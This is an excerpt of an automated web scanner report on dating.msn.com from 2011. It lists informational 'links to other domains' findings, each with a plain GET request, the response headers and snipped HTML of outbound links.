<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=sdff93&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/64/00/96896400B.jpeg" alt="sdff93" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/94/87/63859487G.jpeg" alt="fire4612" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=fire4612&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/94/87/63859487G.jpeg" alt="fire4612" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/76/34/48967634Q.jpeg" alt="RomanCraig81" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=RomanCraig81&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/76/34/48967634Q.jpeg" alt="RomanCraig81" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/16/59/80701659D.jpeg" alt="ryanm1502" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=ryanm1502&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/16/59/80701659D.jpeg" alt="ryanm1502" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/09/23/79410923U.jpeg" alt="Surfrich1980" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Surfrich1980&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/09/23/79410923U.jpeg" alt="Surfrich1980" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/68/09/47026809R.jpeg" alt="lock40" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=lock40&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/68/09/47026809R.jpeg" alt="lock40" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

5.3. http://dating.msn.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /index.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.aspx?TrackingID=516163&BannerID=670269 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:06:58 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=8ee25553-ab4f-43a4-b68f-4019f1882ec5; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=f5e89a40-5f1f-46d3-8e35-274f8d3731c3&THEME=214; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44047

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/index/56452/56452.css" rel="stylesheet" type="text/css" />
<style>
...[SNIP]...
<noscript><img
src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li id="navChemistry"><a href="http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368">Chemistry</a>
...[SNIP]...
<div id="pnlButton"> <img src="http://cp.match.com/cppp/msn/index/47981/btn.gif" width="208" height="36" alt="View Photos &raquo;" class="btnQuickSearch" />
                       <input type="hidden" name="po" value="1" id="po"/>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24645.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24653.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24751.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24740.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24752.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24742.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24753.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24743.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24754.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24744.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24755.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24746.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24756.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24747.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24757.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24748.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24759.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24749.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24760.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24783.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<p><a href="http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010">Member Sign In &raquo;</a>
...[SNIP]...
<div id="arr"><img src="http://cp.match.com/cppp/msn/index/47981/chemarr.gif" width="7" height="11" border="0" /></div>
...[SNIP]...
<div id="opts"><a href="http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369" target="_blank"><img src="http://cp.match.com/cppp/msn/index/55688/chem1.jpg" width="598" height="141" border="0" /></a>
...[SNIP]...
<div id="pnlAd"><a href="http://msn.chemistry.com/cp/landing/39316?trackingid=516068&bannerid=2104436"><img src="http://cp.match.com/en-us/chemistry/freeComm/56899/MSN_FCW_279_115.gif" width="279" height="115" border="0" /></a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/food-aphrodisiacs?ocid=xnetr1-2">Aphrodisiacs from around the globe</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/hollywoods-shooting-stars-2011/ufcvg6io?q=Hollywood&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNXNM&amp;ocid=xnetr2-3">Bing: Hollywood's rising stars for 2011</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/tip-spare-tire/1re6xmxef?q=obesity&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNXNM&amp;ocid=xnetr1-4">There's nothing jolly about a big belly</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li class="last"> Follow MSN on <a href="http://www.followmsn.com/?ocid=TXT_MSNCH_DATING_FollowMSN">Facebook</a> | <a href="http://www.followmsn.com/?ocid=TXT_MSNCH_DATING_FollowMSN">Twitter</a>
...[SNIP]...

5.4. http://dating.msn.com/profile/showprofiledl.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /profile/showprofiledl.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /profile/showprofiledl.aspx?tp=ms&handle=mjhg8tr&uid=mLdcDpyVPCAVYGUaNrEo/Q==&trackingid=525877&bannerid=692804 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:00 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=085de06d-fc4c-4fde-8af4-49643f5f15a8; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: SECU=TID=525877&ESID=f880f4a8-c8e2-48be-ac08-57819cb209a5&THEME=84; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&amp;ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   <!-- Start //WI: 9402: blue "Subscribe Today" banner 100% on the sharkin : SM -09/11 -->
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&amp;linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
<a href="/howitworks/index.aspx?lid=0"><img src="http://images.match.com/match/content/orient_tour.gif" style="border-width:0px;" /></a>
...[SNIP]...
<div id="pnlButton">
        <img src="http://images.match.com/match/search/8357_qSearch_btn.gif" alt="Quick Search" class="btnQuickSearch" tabindex="9"/>
           <input type="hidden" name="cl" value="1" id="cl" />
...[SNIP]...
<td align="left" valign="top" rowspan="11" bgcolor="#333333"><img src="http://images.match.com/match/s.gif" width="9" height="10" /></td>
                <td align="left" valign="top" bgcolor="#333333"><img src="http://images.match.com/match/s.gif" width="10" height="10" /></td>
                <td align="left" valign="top" bgcolor="#333333"><img src="http://images.match.com/match/s.gif" width="25" height="10" /></td>
                <td align="left" valign="top" bgcolor="#333333"><img src="http://images.match.com/match/s.gif" width="125" height="10" /></td>
                <td align="left" valign="top" rowspan="11" bgcolor="#333333"><img src="http://images.match.com/match/s.gif" width="7" height="10" /></td>
                <td align="left" valign="top" rowspan="11" bgcolor="#CCD0D5"><img src="http://images.match.com/match/s.gif" width="1" height="10" /></td>
...[SNIP]...
<a id="ctl00_workarea_ctl00_ctl00_ProfileHyperLink1" href="/profile/showprofile.aspx?uid=mLdcDpyVPCAVYGUaNrEo%2fQ%3d%3d&amp;Handle=mjhg8tr&amp;sec=8"><img src="http://thumbnails.match.com/thumbnails/90/57/93369057B.jpeg" alt="mjhg8tr" style="border-width:0px;" /></a>
...[SNIP]...
<td align="left" valign="top" bgcolor="#333333" colspan="3"><img src="http://images.match.com/match/s.gif" width="175" height="10" /></td>
...[SNIP]...
<td align="center" valign="top" bgcolor="#333333" colspan="3"><img src="http://images.match.com/match/s.gif" width="175" height="5" /></td>
...[SNIP]...
<td align="center" valign="top" bgcolor="#333333" colspan="3"><img id="proPhotoLine" src="http://images.match.com/match/profile/pro_dot_f0f0f0.gif" width="135" height="1" /></td>
...[SNIP]...
<td align="center" valign="top" bgcolor="#333333" colspan="3"><img src="http://images.match.com/match/s.gif" width="175" height="10" /></td>
...[SNIP]...
<td align="left" valign="top" bgcolor="#333333"><img src="http://images.match.com/match/s.gif" width="25" height="1" /></td>
...[SNIP]...
n('/taf/sendtofriendprofilepopup.aspx?tp=ms&handle=mjhg8tr&uid=mLdcDpyVPCAVYGUaNrEo%2fQ%3d%3d&trackingid=525877&bannerid=692804','','width=470,height=500,status=0,titlebar=0,toolbar=0,scrollbars=0');"><img src="http://images.match.com/match/profile/icon_forward_big.gif" width="20" height="20" alt="send me to a friend" border="0" /></a>
...[SNIP]...
<td align="center" valign="top" bgcolor="#333333" colspan="3"><img src="http://images.match.com/match/s.gif" width="175" height="5" /></td>
...[SNIP]...
<td align="left" valign="top" bgcolor="#333333"><img src="http://images.match.com/match/s.gif" width="25" height="1" /></td>
...[SNIP]...
<a href='/matchbook/addEntry.aspx?tp=ms&handle=mjhg8tr&uid=mLdcDpyVPCAVYGUaNrEo%2fQ%3d%3d&trackingid=525877&bannerid=692804'><img src="http://images.match.com/match/profile/icon_matchbook_big.gif" width="20" height="20" alt="add me to favorites" border="0" /></a>
...[SNIP]...
<td align="left" valign="top" colspan="6"><img id="imgPhotoBgBtm" src="http://images.match.com/match/profile/pro_photo_btm.gif" width="192" height="12" /></td>
...[SNIP]...
" id="lnkProOther" onmouseover="ImageSwap(imgEmail,'http://images.match.com/match/profile/icon_email_on.gif');" onmouseout="ImageSwap(imgEmail,'http://images.match.com/match/profile/icon_email.gif');"><img id="imgEmail" src="http://images.match.com/match/profile/icon_email.gif" width="20" height="20" /></a>
...[SNIP]...
nmouseover="ImageSwap(imgInterest,'http://images.match.com/match/profile/icon_showinterest_on.gif');" onmouseout="ImageSwap(imgInterest,'http://images.match.com/match/profile/icon_showinterest.gif');"><img id="imgInterest" src="http://images.match.com/match/profile/icon_showinterest.gif" width="20" height="20" /></a>
...[SNIP]...
bar=0,scrollbars=0');" onmouseover="ImageSwap(imgHelp,'http://images.match.com/match/profile/icon_help_on.gif');" onmouseout="ImageSwap(imgHelp,'http://images.match.com/match/profile/icon_help.gif');"><img id="imgHelp" src="http://images.match.com/match/profile/icon_help.gif" width="14" height="15" alt="" border="0" /></a>
...[SNIP]...
<td align="left" valign="top" rowspan="20"><img src="http://images.match.com/match/s.gif" width="4" height="12" /></td>
       <td align="left" valign="top"><img src="http://images.match.com/match/s.gif" width="110" height="12" /></td>
       <td align="left" valign="top"><img src="http://images.match.com/match/s.gif" width="220" height="12" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="3"><img src="http://images.match.com/match/s.gif" width="1" height="10" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="15" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<td align="left" valign="top" colspan="2"><img src="http://images.match.com/match/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<div id="pro_deepSpacer1" class="pro_deepSpacer"><IMG alt="" src="http://images.match.com/match/profile/pro_deeplink_bottombg_white.gif" width="555" height="50" border="0"></IMG>
...[SNIP]...
<div id="pro_deepSpacer2" class="pro_deepSpacer"><img src="http://images.match.com/match/s.gif" width="1" height="10" id="imgSpacer" /></div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

5.5. http://dating.msn.com/search/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /search/index.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/index.aspx?TrackingID=516163&BannerID=723032&q=man,woman,18,35 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:00 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=482aa899-a2a3-4559-a00f-865a956f031c; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=a3ab92c8-1fb5-479f-b04c-6eedb9ec6c26&THEME=214; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
